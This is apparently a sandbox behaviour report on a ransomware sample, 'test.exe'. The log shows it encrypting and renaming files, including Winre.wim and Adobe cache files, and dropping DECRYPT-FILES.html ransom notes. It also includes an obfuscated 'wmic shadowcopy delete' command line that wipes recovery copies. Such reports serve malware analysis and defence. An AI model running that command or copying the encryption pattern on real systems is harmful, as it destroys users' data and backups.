Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 393234 True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 393234 True 1
Fn
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 0 True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 264 True 1
Fn
System Get Time type = Ticks, time = 134363 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
File Move source_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, destination_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.9emKr True 1
Fn
File Create filename = C:\Recovery\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\System Volume Information\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE False 1
Fn
File Create filename = C:\System Volume Information\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE False 1
Fn
File Create filename = C:\Users\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Users\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\\DECRYPT-FILES.html, size = 6586 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\\DECRYPT-FILES.html, size = 6586 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\\DECRYPT-FILES.html, size = 6586 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\\DECRYPT-FILES.html, size = 6586 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\\DECRYPT-FILES.html, size = 6586 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\\DECRYPT-FILES.html, size = 6586 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst, type = size, size_out = 35116 True 1
Fn
Module Create Mapping module_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst, filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Module Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst, process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Module Unmap process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst, size = 264 True 1
Fn
System Get Time type = Ticks, time = 134738 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
File Move source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst, destination_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst.wHLcdW True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst, type = size, size_out = 138459 True 1
Fn
Module Create Mapping module_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst, filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Module Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst, process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Module Unmap process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst, size = 264 True 1
Fn
System Get Time type = Ticks, time = 134878 True 1
Fn
File Move source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst, destination_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst.34tSh1K True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\\DECRYPT-FILES.html, size = 6586 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst, type = size, size_out = 53188 True 1
Fn
Module Create Mapping module_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst, filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Module Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst, process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Module Unmap process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst, size = 264 True 1
Fn
System Get Time type = Ticks, time = 134925 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
File Move source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst, destination_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst.iHt9 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents, type = size, size_out = 5120 True 1
Fn
Module Create Mapping module_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents, filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Module Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents, process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Module Unmap process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents, size = 264 True 1
Fn
System Get Time type = Ticks, time = 135034 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
File Move source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents, destination_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents.6PFi True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin, type = size, size_out = 77477 True 1
Fn
Module Create Mapping module_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin, filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Module Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin, process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Module Unmap process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin, size = 264 True 1
Fn
System Get Time type = Ticks, time = 135112 True 1
Fn
File Move source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin, destination_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin.KH4Dw9W True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Thread 0xa84
250 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Process #2: svchost.exe
0 0
»
Information Value
ID #2
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:37, Reason: RPC Server
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:38
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x36c
Parent PID 0x1cc (c:\windows\system32\services.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 850
0x 790
0x 798
0x 7F8
0x 430
0x 268
0x 768
0x 764
0x 760
0x 75C
0x 70C
0x 6E8
0x 6D8
0x 6D4
0x 6C8
0x 6C0
0x 6B8
0x 6A4
0x 6A0
0x 690
0x 67C
0x 490
0x 454
0x 450
0x 428
0x 424
0x 420
0x 404
0x 18C
0x F0
0x C8
0x 3F0
0x 3E4
0x 398
0x 394
0x 390
0x 38C
0x 378
0x 370
0x A5C
0x A60
0x A9C
0x AA0
0x AA4
0x AA8
0x AAC
0x AB0
0x AB4
0x AB8
0x ABC
0x AC0
0x AC8
0x ACC
Process #4: wmic.exe
163 0
»
Information Value
ID #4
File Name c:\windows\system32\wbem\wmic.exe
Command Line "C:\m\..\Windows\ovxhp\sff\qyv\..\..\..\system32\w\sfc\roma\..\..\..\wbem\ux\dgfg\..\..\wmic.exe" shadowcopy delete
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:55, Reason: Child Process
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:20
OS Process Information
»
Information Value
PID 0xa78
Parent PID 0xa38 (c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A7C
0x A98
0x AD8
0x ADC
0x AE0
0x AE4
Threads
Thread 0xa7c
163 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-06-01 18:40:49 (UTC) True 1
Fn
System Get Time type = Ticks, time = 119855 True 1
Fn
System Get Time type = Performance Ctr, time = 17832216577 True 1
Fn
Module Get Handle module_name = c:\windows\system32\wbem\wmic.exe, base_address = 0xff4a0000 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\kernel32.dll, base_address = 0x76e30000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76e46d40 True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 True 1
Fn
COM Create interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Local Time, time = 2019-06-02 04:40:51 (Local Time) True 1
Fn
Process #5: wmiprvse.exe
0 0
»
Information Value
ID #5
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:01, Reason: RPC Server
